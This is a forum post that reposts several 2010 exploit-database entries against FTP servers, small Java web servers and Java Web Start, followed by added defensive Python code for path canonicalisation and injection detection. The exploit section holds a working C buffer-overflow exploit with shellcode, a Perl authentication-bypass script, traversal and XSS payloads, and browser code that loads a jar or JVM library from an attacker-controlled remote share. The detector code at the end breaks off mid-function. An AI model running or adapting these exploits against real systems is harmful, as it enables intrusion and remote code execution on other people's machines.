Dev-Point (نقطة التطوير) - dev-point.com

Miscellaneous vulnerabilities
#1 xp-10 (Active DeveloPer)
Miscellaneous vulnerabilities, posted 22-Apr-2010, 01:17 AM

Peace be upon you, and the mercy and blessings of God.



# title: CompleteFTP Server directory traversal
# edb-id: 11973
# cve-id: ()
# osvdb-id: ()
# author: Zombiefx
# published: 2010-03-30
# verified: Yes

# Exploit Title: CompleteFTP Server directory traversal
# Date: 2010-03-30
# Author: Zombiefx darkernet@gmail.com
# Software Link: http://www.enterprisedt.com/products...teftpsetup.exe
# Version: CompleteFTP Server v 3.3.0
# Tested on: Windows XP SP3
# CVE :
# Code :

230 User test logged in.
ftp> pwd
257 "/home/test" is current directory.
ftp> cd ..\..\..\..\..\..\..\..\
250 Directory changed to "/home/test/..\..\..\..\..\..\..\..\".
ftp> get boot.ini
200 PORT command successful.
150 Opening ASCII mode data connection for boot.ini
226 Transfer complete.
ftp: 215 bytes received in 0.14Seconds 1.54Kbytes/sec.





# title: Java Mini Web Server <= 1.0 path traversal and cross site scripting
# edb-id: 12033
# cve-id: ()
# osvdb-id: ()
# author: Cp77fk4r
# published: 2010-04-03
# verified: No

# Exploit Title: Java Mini Web Server <= 1.0 path traversal & cross site scripting.
# Date: 20/03/10
# Author: Cp77fk4r | empty0page[shift+2]gmail.com | www.digitalwhisper.co.il
# Software Link: http://www.jibble.org/miniwebserver/
# Version: <= 1.0
# Tested on: JRE build 1.6.0_17-b04
#
##[Cross Site Scripting]
Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-Site Scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it. (OWASP)
#
GET /%00">[your_xss_here]<"
#
#e.g:
-HTTP request:
GET %00"><font color=red>work?</font><" HTTP/1.1
Host: localhost
#
-HTTP response (data):
<html><head><title>Index of %00"><font color=red>work?</font><"/</title></head><body><h3>Index of %00"><font color=red>work?</font><"/</h3><p>
<a href="%00"><font color=red>work?</font><"/SimpleWebServer.jar">SimpleWebServer.jar</a> <br>
</p><hr><p>SimpleWebServer http://www.jibble.org/</p></body><html>#
#
#
##[Path Traversal:]
A path traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and its variations, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses "../" sequences to move up to the root directory, thus permitting navigation through the file system. (OWASP)
#
http://localhost/%5c%2e%2e%5c%2e%2e%...%2e%2e%5c1.txt
("1.txt" located in the root directory on the volume)
#
#
[EOF]


# title: Easy FTP Server v1.7.0.2 MKD remote post-authentication BoF exploit
# edb-id: 12044
# cve-id: ()
# osvdb-id: ()
# author: x90c
# published: 2010-04-04
# verified: Yes

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>         /* close()     (include missing from the original) */
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>      /* inet_addr() (include missing from the original) */

//*************************************************************************
// Easy~FTP Server v1.7.0.2 MKD remote post-authentication BoF exploit
// ( 11470_x90c.c )
//
// Date: 24/03/2010
// Author: x90c < x90c.org >
//
// Discovered by: Loneferret
//
// Exploits by:
// [1] 11470.py (PoC) - Loneferret ( found: 13/02/2010 )
//     - http://www.exploit-db.com/exploits/11470
// [2] 11470_x90c.c ( exploit )
//     ( magic ret, metasploit shellcode )
//*************************************************************************

// metasploit shellcode ( calc.exe ) - 228 bytes
static char shellcode[] =
{
    "\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93"
    "\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f"
    "\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04"
    "\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb"
    "\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e"
    "\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6"
    "\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21"
    "\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11"
    "\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a"
    "\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5"
    "\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21"
    "\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69"
    "\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36"
    "\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5"
    "\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b"
    "\x1b\x35\x1d"
};

int main(int argc, char *argv[])
{
    int sockfd = -1;
    struct sockaddr_in sa;
    char rbuf[128];
    char x0x[279];   /* 278 payload bytes + NUL; the original declared 278 and then wrote x0x[278] */
    int i = 0, j = 0;
    int port = 0;
    int err = 0;

    printf("\n\n***********************************************\n");
    printf("* Easy FTP Server 1.7.0.2 MKD remote BoF *\n");
    printf("* found by: Loneferret *\n");
    printf("* - http://www.exploit-db.com/exploits/11470 *\n");
    printf("* - 11470_x90c.c - x90c *\n");
    printf("***********************************************\n\n");

    if( argc < 3 )
    {
        printf("usage: %s <target ip> <port>\n\n", argv[0]);
        exit(1);
    }

    port = atoi(argv[2]);

    if(port <= 0 || port > 65535)
    {
        port = 21;
    }

    printf("[port] %d/tcp\n", port);

    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_addr.s_addr = inet_addr(argv[1]);
    sa.sin_port = htons(port);

    if((sockfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
    {
        err = -1;
        fprintf(stderr, "[!] socket failed\n");
        goto out;
    }

    // socket connect
    if(connect(sockfd, (struct sockaddr *)&sa, sizeof(struct sockaddr)) == -1)
    {
        err = -2;
        fprintf(stderr, "[!] connection failed!\n");
        goto out;
    }

    printf("[+] connected!\n");

    // auth
    // rbuf is zeroed and one byte is kept free before every recv() so that
    // strstr() always operates on a NUL-terminated string
    memset(rbuf, 0, sizeof(rbuf));
    recv(sockfd, rbuf, sizeof(rbuf) - 1, 0);

    send(sockfd, "USER anonymous\r\n", 16, 0);
    memset(rbuf, 0, sizeof(rbuf));
    recv(sockfd, rbuf, sizeof(rbuf) - 1, 0);
    if(strstr(rbuf, "okay") != NULL)
        printf("[USER] anonymous\n");

    send(sockfd, "PASS anonymous\r\n", 16, 0);
    memset(rbuf, 0, sizeof(rbuf));
    recv(sockfd, rbuf, sizeof(rbuf) - 1, 0);
    if(strstr(rbuf, "logged in.") != NULL)
        printf("[PASS] anonymous\n");

    // fill payload
    memset(x0x, 0x90, sizeof(x0x));

    for(i = 20, j = 0; j < (int)strlen(shellcode); j++)
        x0x[i++] = shellcode[j];

    x0x[0] = 'M';
    x0x[1] = 'K';
    x0x[2] = 'D';
    x0x[3] = ' ';

    // magic ret:
    // # call ebp ( ebp register points to nopsled of this payload when overflowed )
    // # 004041EC FFD5 |call ebp
    // #
    //
    x0x[272] = '\xec';
    x0x[273] = '\x41';
    x0x[274] = '\x40';
    x0x[275] = '\x00';

    x0x[276] = '\r';
    x0x[277] = '\n';
    x0x[278] = '\x00';

    printf("[+] sending payload...\n");

    // send payload
    send(sockfd, x0x, 278, 0);
    memset(rbuf, 0, sizeof(rbuf));
    recv(sockfd, rbuf, sizeof(rbuf) - 1, 0);
    if((strstr(rbuf, "denied.") != NULL) || (strstr(rbuf, "too long") != NULL))
    {
        printf("[!] anonymous account doesn't have permission to MKD command...\n");
        printf("[!] exploit failed. ;-x\n");
        goto out;
    }

    printf("[+] exploited :-)\n");

out:
    if(sockfd != -1)
        close(sockfd);
    return err;
}

# title: Miniature Java Web Server <= 1.71 multiple vulnerabilities
# edb-id: 12114
# cve-id: ()
# osvdb-id: ()
# author: Cp77fk4r
# published: 2010-04-08
# verified: Yes

# Exploit Title: Miniature Java Web Server <= 1.71 multiple vulnerabilities.
# Date: 26/03/10
# Author: Cp77fk4r | empty0page[shift+2]gmail.com | www.digitalwhisper.co.il
# Software Link: http://tjws.sourceforge.net/#download
# Version: <= 1.71
# Tested on: JRE build 1.6.0_17-b04
#
##[Path Traversal:]
A path traversal attack aims to access files and directories that are stored outside the web root folder. By browsing the application, the attacker looks for absolute links to files stored on the web server. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and its variations, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration and critical system files, limited by system operational access control. The attacker uses "../" sequences to move up to the root directory, thus permitting navigation through the file system. (OWASP)
#
http://localhost/..%5c..%5c..%5c..%5....%5c..%5c..%5c
(you'll get the root directory on the volume)
#
#
##[Open Redirect:]
An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. (OWASP)
#
HTTP request:
#
GET /%00 HTTP/1.1\r\nHost: digitalwhisper.co.il\r\n\r\n
#
leads to:
#
HTTP response:
#
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Location: http://digitalwhisper.co.il/ /
Connection: Keep-Alive
Date: Thu, 25 Mar 2010 1740 GMT
Keep-Alive: timeout=30, max=100
Content-Length: 303
Server: D. Rogatkin's TJWS based on Acme.Serve/Version 1.71, $Revision: 1.199 $
MIME-Version: 1.0

<html><head><title>302 Moved</title></head><body bgcolor="#D1E9FE"><h2>302 Moved</h2>This document has moved <a href=http://digitalwhisper.co.il/
#
#
##[403 (Forbidden) Bypass:] (Insufficient Authorization)
Insufficient Authorization results when an application does not perform adequate authorization checks to ensure that the user is performing a function or accessing data in a manner consistent with the security policy. Authorization procedures should enforce what a user, service or application is permitted to do. When a user is authenticated to a web site, it does not necessarily mean that the user should have full access to all content and functionality. (WASC)
#
The attacker can bypass a forbidden file by adding %2f before the forbidden folder/file.
#
#e.g:
HTTP request:
#
GET /demo-servlets/WEB-INF/config/mishka.properties HTTP/1.1
Host: localhost
#
leads to:
#
HTTP response:
#
HTTP/1.1 403 Forbidden
Content-Type: text/html
Connection: Keep-Alive
Date: Thu, 25 Mar 2010 1756 GMT
Keep-Alive: timeout=30, max=100
Content-Length: 243
Server: D. Rogatkin's TJWS based on Acme.Serve/Version 1.71, $Revision: 1.199 $
MIME-Version: 1.0

<html><head><title>403 Forbidden</title></head><body bgcolor="#D1E9FE"><h2>403 Forbidden</h2><hr><address><a href="http://tjws.sourceforge.net">D. Rogatkin's TJWS based on Acme.Serve Version 1.71, $Revision: 1.199 $</a></address></body></html>
#
but:
#
HTTP request:
#
GET /demo-servlets/%2fWEB-INF/config/mishka.properties HTTP/1.1
Host: localhost
#
leads to:
#
HTTP response:
#
HTTP/1.1 200 OK
Content-Type: unknown
Connection: Keep-Alive
Date: Thu, 08 Apr 2010 1835 GMT
Last-Modified: Thu, 25 Mar 2010 16:41:58 GMT
Keep-Alive: timeout=30, max=100
Content-Length: 364
Server: D. Rogatkin's TJWS based on Acme.Serve/Version 1.71, $Revision: 1.199 $
MIME-Version: 1.0

# xml persistant storage location
config=mishka.xml
workerprefix=javaarchitect.servlet.mishka.
# html template path
templateroot=/javaarchitect/servlet/mishka/resource
password=*************
messageboard_password=*************
#messageboard_realmname=lunch administrator
defaultservant=frontpage
charset=koi8-r
messageboardstore=lunchboard.store
debug=1
#
#
##[Full Path Disclosure:]
Full Path Disclosure (FPD) vulnerabilities enable the attacker to see the path to the webroot/file. E.g.: /home/omg/htdocs/file/. Certain vulnerabilities, such as using the load_file() (within a SQL injection) query to view the page source, require the attacker to have the full path to the file they wish to view. (OWASP)
#
http://localhost/demo-servlets/snoop.jsp
#
#
[EOF]



# title: Java Web Start arbitrary command-line injection
# edb-id: 12122
# cve-id: ()
# osvdb-id: ()
# author: Ruben Santamarta
# published: 2010-04-09
# verified: Yes

Bye bye my little 0day :(, Tavis Ormandy did a great job uncovering a big logic flaw within the Java JRE. I discovered that bug and another that affects every browser a few weeks ago and I posted the common "0day++" tweet.

The method in which Java Web Start support has been added to the JRE is nothing less than a deliberately embedded backdoor (I really don't think so) or a flagrant case of extreme negligence (+1). Let's see:

Java plugin for browsers (Chrome, Firefox...) - Windows: npjp2.dll (the same for IE8's jp2iexp.dll)

.text:6DAA3D96
.text:6DAA3D96 ; =============== S U B R O U T I N E =======================================
.text:6DAA3D96
.text:6DAA3D96 ; Attributes: bp-based frame
.text:6DAA3D96
.text:6DAA3D96 sub_6DAA3D96 proc near ; CODE XREF: sub_6DAA2ACB+170p
.text:6DAA3D96
.text:6DAA3D96 Data = byte ptr -264h
.text:6DAA3D96 var_263 = byte ptr -263h
.text:6DAA3D96 ApplicationName = byte ptr -160h
.text:6DAA3D96 StartupInfo = _STARTUPINFOA ptr -5Ch
.text:6DAA3D96 ProcessInformation = _PROCESS_INFORMATION ptr -18h
.text:6DAA3D96 cbData = dword ptr -8
.text:6DAA3D96 hKey = dword ptr -4
.text:6DAA3D96 arg_0 = dword ptr 8
.text:6DAA3D96 arg_4 = dword ptr 0Ch
.text:6DAA3D96
.text:6DAA3D96 push ebp
.text:6DAA3D97 mov ebp, esp
.text:6DAA3D99 sub esp, 264h
.text:6DAA3D9F push edi
.text:6DAA3DA0 lea eax, [ebp+hKey]
.text:6DAA3DA3 push eax ; phkResult
.text:6DAA3DA4 push 20019h ; samDesired
.text:6DAA3DA9 xor edi, edi
.text:6DAA3DAB push edi ; ulOptions
.text:6DAA3DAC push offset SubKey ; "JNLPFile\\shell\\open\\command"
.text:6DAA3DB1 push 80000000h ; hKey
.text:6DAA3DB6 mov [ebp+cbData], 104h
.text:6DAA3DBD call ds:RegOpenKeyExA
.text:6DAA3DC3 test eax, eax
.text:6DAA3DC5 jz short loc_6DAA3DCE
.text:6DAA3DC7 xor eax, eax
.text:6DAA3DC9 jmp loc_6DAA3F16

The default handler is "javaws.exe", continuing...

.text:6DAA3EB7 push [ebp+arg_4]
.text:6DAA3EBA push eax
.text:6DAA3EBB push offset aSDocbaseSS ; "\"%s\" -docbase %s %s"
.text:6DAA3EC0 push esi ; LPSTR
.text:6DAA3EC1 call ebx ; wsprintfA
.text:6DAA3EC3 add esp, 14h
.text:6DAA3EC6 jmp short loc_6DAA3ED4
.text:6DAA3EC8 ; ---------------------------------------------------------------------------
.text:6DAA3EC8
.text:6DAA3EC8 loc_6DAA3EC8: ; CODE XREF: sub_6DAA3D96+11Fj
.text:6DAA3EC8 push eax
.text:6DAA3EC9 push offset aSS_0 ; "\"%s\" %s"
.text:6DAA3ECE push esi ; LPSTR
.text:6DAA3ECF call ebx ; wsprintfA
.text:6DAA3ED1 add esp, 10h
.text:6DAA3ED4
.text:6DAA3ED4 loc_6DAA3ED4: ; CODE XREF: sub_6DAA3D96+130j
.text:6DAA3ED4 push 11h
.text:6DAA3ED6 pop ecx
.text:6DAA3ED7 xor eax, eax
.text:6DAA3ED9 lea edi, [ebp+StartupInfo]
.text:6DAA3EDC rep stosd
.text:6DAA3EDE lea eax, [ebp+ProcessInformation]
.text:6DAA3EE1 push eax ; lpProcessInformation
.text:6DAA3EE2 xor ebx, ebx
.text:6DAA3EE4 lea eax, [ebp+StartupInfo]
.text:6DAA3EE7 push eax ; lpStartupInfo
.text:6DAA3EE8 push ebx ; lpCurrentDirectory
.text:6DAA3EE9 push ebx ; lpEnvironment
.text:6DAA3EEA push ebx ; dwCreationFlags
.text:6DAA3EEB push ebx ; bInheritHandles
.text:6DAA3EEC push ebx ; lpThreadAttributes
.text:6DAA3EED push ebx ; lpProcessAttributes
.text:6DAA3EEE push esi ; lpCommandLine
.text:6DAA3EEF lea eax, [ebp+ApplicationName]
.text:6DAA3EF5 push eax ; lpApplicationName
.text:6DAA3EF6 mov [ebp+StartupInfo.cb], 44h
.text:6DAA3EFD call ds:CreateProcessA

So basically the Java browser plugin is running "javaws.exe" without validating command-line parameters. These parameters can be controlled by attackers via specially crafted embed HTML tags within a webpage.

Let's see javadeploy.txt:

if (browser == 'MSIE') {
    document.write('<' +
        'object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" ' +
        'width="0" height="0">' +
        '<' + 'param name="launchjnlp" value="' + jnlp + '"' + '>' +
        '<' + 'param name="docbase" value="' + jnlpDocbase + '"' + '>' +
        '<' + '/' + 'object' + '>');
} else if (browser == 'Netscape Family') {
    document.write('<' +
        'embed type="application/x-java-applet;jpi-version=' +
        deployJava.firefoxJavaVersion + '" ' +
        'width="0" height="0" ' +
        'launchjnlp="' + jnlp + '"' +
        'docbase="' + jnlpDocbase + '"' +
        ' />');
}

That's it. This is how the Java plugin identifies Java Web Start content (JNLP files), so we can inject command-line parameters through the "docbase" tag and even "launchjnlp".

What type of arguments can we abuse to compromise a system?
java.exe and javaw.exe support an undocumented, hidden command-line parameter "-XXaltjvm" and curiously also "-J-XXaltjvm" (see the -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil; in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...

Linux

Same logic error, check this function "_Z10launchJNLPPKcS0" in libnpjp2.so

MacOSX

Not vulnerable.

Workaround

Disable javaws/javaws.exe in Linux and Windows by any means. Disable the Deployment Toolkit to avoid unwanted installation as stated in Tavis' advisory.


# title: Windows FTP Server by DWG (auth bypass)
# edb-id: 12119
# cve-id: ()
# osvdb-id: ()
# author: Chap0
# published: 2010-04-09
# verified: Yes

# Exploit Title: Windows FTP Server by DWG (auth bypass)
# Date: April 09, 2010
# Software Link: [http://www.windowsftpserver.com/free_download.html]
# Version: V 1.4
# Tested on: Windows XP SP3
# Author: Chap0
# Email: Chap0x90[at]gmail[dot]com
# Site: [www.setfreesecurity.com]
#
# Windows FTP Server by DWG Software is vulnerable to
# an authentication bypass that will allow attackers to
# connect with any username and password.
# This gives attackers full access to the top level
# directory of the FTP server.
#
# Greetz and many thanks to all Exploit-DBers and God gets the glory
#
#
#!/usr/bin/perl

use IO::Socket;

$luser = "evil";
$pass = "hacker";

# die instead of printing into an undefined handle when the connect fails
$mysock = IO::Socket::INET->new(PeerAddr => '192.168.2.6', PeerPort => '21', Proto => 'tcp')
    or die "connect failed: $@\n";

print "connecting with bad credentials. . .\n";
sleep(1);

print $mysock "USER $luser\r\n";
print $mysock "PASS $pass\r\n";

print "making hacked folder . . .\n";
sleep(2);

print $mysock "MKD hacked\r\n";

print "done . . .\n";
sleep(1);

# title: Java Deployment Toolkit performs insufficient validation of parameters
# edb-id: 12117
# cve-id: ()
# osvdb-id: ()
# author: Tavis Ormandy
# published: 2010-04-09
# verified: Yes

Java Deployment Toolkit Performs Insufficient Validation of Parameters
-------------------------------------------------------------------------

Java Web Start (henceforth, JWS) provides Java developers with a way to let
users launch and install their applications using a URL to a Java Networking
Launching Protocol (.jnlp) file (essentially some XML describing the
program).

Since Java 6 Update 10, Sun has distributed an NPAPI plugin and ActiveX control
called "Java Deployment Toolkit" to provide developers with a simpler method
of distributing their applications to end users. This toolkit is installed by
default with the JRE and marked safe for scripting.

The launch() method provided by the toolkit object accepts a URL string, which
it passes to the registered handler for JNLP files, which by default is the
javaws utility.

$ cmd /c ver
Microsoft Windows XP [Version 5.1.2600]

$ java -version
java version "1.6.0_19"
Java(TM) SE Runtime Environment (build 1.6.0_19-b04)
Java HotSpot(TM) Client VM (build 16.2-b04, mixed mode, sharing)

$ cat /proc/registry/HKEY_LOCAL_MACHINE/SOFTWARE/Classes/JNLPFile/shell/open/command/\@
"C:\Program Files\Java\jre6\bin\javaws.exe" "%1"

The toolkit provides only minimal validation of the URL parameter, allowing us
to pass arbitrary parameters to the javaws utility, which provides enough
functionality via command line arguments to allow this error to be exploited.

The simplicity with which this error can be discovered has convinced me
that releasing this document is in the best interest of everyone except
the vendor.

--------------------
Affected Software
--------------------

All versions since Java SE 6 Update 10 for Microsoft Windows are believed to be
affected by this vulnerability. Disabling the Java plugin is not sufficient to
prevent exploitation, as the toolkit is installed independently.

http://java.sun.com/javase/6/docs/te...nt_advice.html

I believe non-Windows installations are unaffected.

--------------------
Consequences
--------------------

Exploitation of this issue is not terribly exciting, but is potentially of high
enough impact to merit explanation. The javaws application supports the
following command line parameters.

$ javaws -help
Usage:  javaws [run-options] <jnlp-file>
        javaws [control-options]

where run-options include:
  -verbose          display additional output
  -offline          run the application in offline mode
  -system           run the application from the system cache only
  -Xnosplash        run without showing a splash screen
  -J<option>        supply option to the vm
  -wait             start java process and wait for its exit

control-options include:
  -viewer           show the cache viewer in the java control panel
  -uninstall        remove all applications from the cache
  -uninstall <jnlp-file>   remove the application from the cache
  -import [import-options] <jnlp-file>   import the application to the cache

import-options include:
  -silent           import silently (with no user interface)
  -system           import application into the system cache
  -codebase <url>   retrieve resources from the given codebase
  -shortcut         install shortcuts as if user allowed prompt
  -association      install associations as if user allowed prompt

Perhaps the most interesting of these is -J, and the obvious attack is simply
to add -jar followed by an attacker controlled UNC path to the JVM command
line, which I've demonstrated below. Other attacks are clearly possible, but
this is sufficient to demonstrate the problem.

In order to trigger this attack in Internet Explorer, an attacker would use a
code sequence like this

/* ... */
var o = document.createElement("object");
o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

Or, for Mozilla Firefox

/* ... */
var o = document.createElement("object");
o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
document.body.appendChild(o);
o.launch("http: -J-jar -J\\\\attacker.controlled\\exploit.jar none");
/* ... */

Please note, at some point the registered MIME type was changed to
application/java-deployment-toolkit, please verify which type applies to
your users when verifying any mitigation implemented has been effective (the
simplest way would be to look at the output of about:plugins on a reference
machine).

A harmless demonstration is provided below.
http://lock.cmpxchg8b.com/bb5eafbc6c.../testcase.html

<html>
<head><title>Java Deployment Toolkit Test Page</title></head>
<body>
<script>
// Tavis Ormandy <taviso@sdf.lonestar.org>, April 2010

var u = "http: -J-jar -J\\\\lock.cmpxchg8b.com\\calc.jar none";

if (window.navigator.appName == "Microsoft Internet Explorer") {
    var o = document.createElement("object");
    o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";

    // trigger the bug
    o.launch(u);
} else {
    // mozilla
    var o = document.createElement("object");
    var n = document.createElement("object");

    o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
    n.type = "application/java-deployment-toolkit";
    document.body.appendChild(o);
    document.body.appendChild(n);

    // test both mime types
    try {
        // old type
        o.launch(u);
    } catch (e) {
        // new type
        n.launch(u);
    }
}

// bonus vulnerability, why not downgrade victim to a JRE vulnerable to
// this classic exploit?
// http://sunsolve.sun.com/search/docum...=1-66-244991-1

// o.installJRE("1.4.2_18");
</script>
</body>
</html>

--------------------
Mitigation
--------------------

If you believe your users may be affected, you should consider applying one of
the workarounds described below as a matter of urgency.

- Internet Explorer users can be protected by temporarily setting the killbit
  on CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA. To the best of my knowledge, the
  Deployment Toolkit is not in widespread usage and is unlikely to impact end
  users.

- Mozilla Firefox and other NPAPI based browser users can be protected using
  file system ACLs to prevent access to npdeploytk.dll. These ACLs can also be
  managed via GPO.

Detailed documentation on killbits is provided by Microsoft here

http://support.microsoft.com/kb/240797

Domain administrators can deploy killbits and file system ACLs using GPOs, for
more information on group policy, see Microsoft's group policy site, here

http://technet.microsoft.com/en-us/w.../bb310732.aspx

You may be tempted to kill the HKLM\...\JNLPFile\shell\open\command key, but
the author does not believe this is sufficient, as the plugin also provides
enough functionality to install and downgrade JRE installations without
prompting (seriously). However, if none of your affected users are local
administrators, this solution may work (untested).

As always, if you do not require this feature, consider permanently disabling
it in order to reduce attack surface.

--------------------
Solution
--------------------

Sun has been informed about this vulnerability, however, they informed me they
do not consider this vulnerability to be of high enough priority to break their
quarterly patch cycle.

For various reasons, I explained that I did not agree, and intended to
publish advice to temporarily disable the affected control until a solution is
available.

--------------------
Credit
--------------------

This bug was discovered by Tavis Ormandy.

This work is my own, and all of the opinions expressed are mine, not my
employer's or anybody else's (I added this for you, Dan. Thanks ;-)).

--------------------
Greetz
--------------------

Greetz to Julien, Neel, Redpig, lcamtuf, spoonm, skylined, asirap, LiquidK,
scarybeasts, Headhntr, Jagger, Sami and Roach.

Some very elite friends have started a consultancy called Inverse Path, you
should really hire them.

http://www.inversepath.com/

--------------------
References
--------------------

- Deploying Java with JNLP, Sun Microsystems.
  http://java.sun.com/developer/techni...gramming/jnlp/

--------------------
Notes
--------------------

My advisories are intended to be consumed by a technical audience of security
professionals and systems administrators who are familiar with the principle
for which the mailing list you have subscribed to is named. If you do not fall
into this category, you can get up to speed by reading this accessible and
balanced essay on the disclosure debate by Bruce Schneier.

http://www.schneier.com/crypto-gram-0111.html#1

Some of us would appreciate it if you made the effort to research and
understand the issues involved before condemning us :-)

Miscellaneous vulnerabilities, all from 2010. If you find something useful, take it; if not, spare the criticism. Best regards.
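Added example, not part of the original post or of the advisories it reproduces: a request-path canonicaliser in Python that rejects every traversal and filter-bypass input shown in the CompleteFTP, Java Mini Web Server and TJWS entries above (backslash separators, percent-encoded `..`, the `%2f` prefix that slipped past the WEB-INF check, and `%00`). It assumes the server has already joined the FTP working directory or HTTP document root onto the request before calling it; `FORBIDDEN_DIRS` and the three-round decode limit are choices made for this example.

```python
import posixpath
from typing import Tuple
from urllib.parse import unquote

# Directories a servlet container must never serve. TJWS compared the raw
# request string, so "/demo-servlets/%2fWEB-INF/..." slipped past it; here
# the comparison happens on the decoded, canonical path instead.
FORBIDDEN_DIRS = {"WEB-INF", "META-INF"}


class PathRejected(ValueError):
    """Raised for any request path that would leave or probe outside the root."""


def canonicalize_request_path(raw: str, max_decode_rounds: int = 3) -> str:
    """Return a normalised '/a/b/c' path for a request target, or raise PathRejected.

    Handles the tricks used against the servers on this page:
      * percent-encoded separators ("%5c%2e%2e%5c" -> "\\..\\"),
      * backslashes acting as separators, as on the Windows-hosted servers,
      * a NUL byte ("/%00..."), which no legitimate URL path contains.
    """
    path = raw
    # Decode until stable so double encoding ("%255c") cannot hide a separator.
    for _ in range(max_decode_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    else:
        raise PathRejected("too many percent-encoding layers")
    if "\x00" in path:
        raise PathRejected("NUL byte in path")
    # Treat "\" exactly like "/", which is what the Windows file API did once
    # the vulnerable servers handed it the unchecked string.
    path = path.replace("\\", "/")
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not segments:
                # CompleteFTP happily produced "/home/test/..\..\..\..\" here.
                raise PathRejected("traversal above root")
            segments.pop()
            continue
        segments.append(seg)
    for seg in segments:
        if seg.upper() in FORBIDDEN_DIRS:
            raise PathRejected("forbidden directory: " + seg)
    return "/" + "/".join(segments)


def resolve_under_root(root: str, raw: str) -> str:
    """Map a request target onto a filesystem path confined to root (POSIX paths)."""
    canon = canonicalize_request_path(raw)
    root_n = posixpath.normpath(root)
    full = posixpath.normpath(posixpath.join(root_n, canon.lstrip("/")))
    # Defence in depth: even after canonicalisation, refuse anything outside root.
    if full != root_n and not full.startswith(root_n + "/"):
        raise PathRejected("escaped document root")
    return full


def vet(raw: str) -> Tuple[bool, str]:
    """Convenience wrapper: (accepted, canonical path or rejection reason)."""
    try:
        return True, canonicalize_request_path(raw)
    except PathRejected as exc:
        return False, str(exc)
```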
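Added example, not code from the Santamarta or Ormandy advisories above: a content-inspection routine in Python that flags the argument-injection pattern both advisories describe (whitespace or `-J`/`-XX` options inside `launchjnlp`, `docbase` or `launch()` values, and a UNC path where a URL belongs), for use in a proxy or mail/web content filter. The regexes, `SAMPLE_HTML` and the host name `attacker.controlled` are constructed for this example.

```python
import re
from typing import List, Tuple

# Places where page content reaches javaws's command line, per the two
# advisories above: the embed/applet attributes launchjnlp and docbase, their
# <param> equivalents, and the Deployment Toolkit's launch() argument.
ATTR_RE = re.compile(r'\b(launchjnlp|docbase)\s*=\s*(["\'])(.*?)\2', re.I | re.S)
PARAM_RE = re.compile(r'<param[^>]*?name\s*=\s*["\']?(launchjnlp|docbase)["\']?'
                      r'[^>]*?value\s*=\s*(["\'])(.*?)\2', re.I | re.S)
LAUNCH_RE = re.compile(r'\.launch\s*\(\s*(["\'])(.*?)\1\s*\)', re.I | re.S)
# Options smuggled in as extra arguments; -J hands the remainder to the JVM.
INJECTED_OPT_RE = re.compile(r'(?:^|\s)(-(?:J|XX)\S*)')
UNC_RE = re.compile(r'\\\\[\w.-]+\\')
# Identifiers of the scriptable Deployment Toolkit control (Ormandy's advisory).
TOOLKIT_MARKERS = (
    "cafeefac-dec7-0000-0000-abcdeffedcba",
    "application/npruntime-scriptable-plugin;deploymenttoolkit",
    "application/java-deployment-toolkit",
)


def judge_launch_value(value: str) -> str:
    """'' when value looks like a single URL; otherwise why it is an injection."""
    v = value.strip()
    if re.search(r"\s", v):
        # wsprintf("\"%s\" -docbase %s %s") adds no quoting, so whitespace
        # splits the value into further javaws arguments.
        opts = INJECTED_OPT_RE.findall(v)
        if opts:
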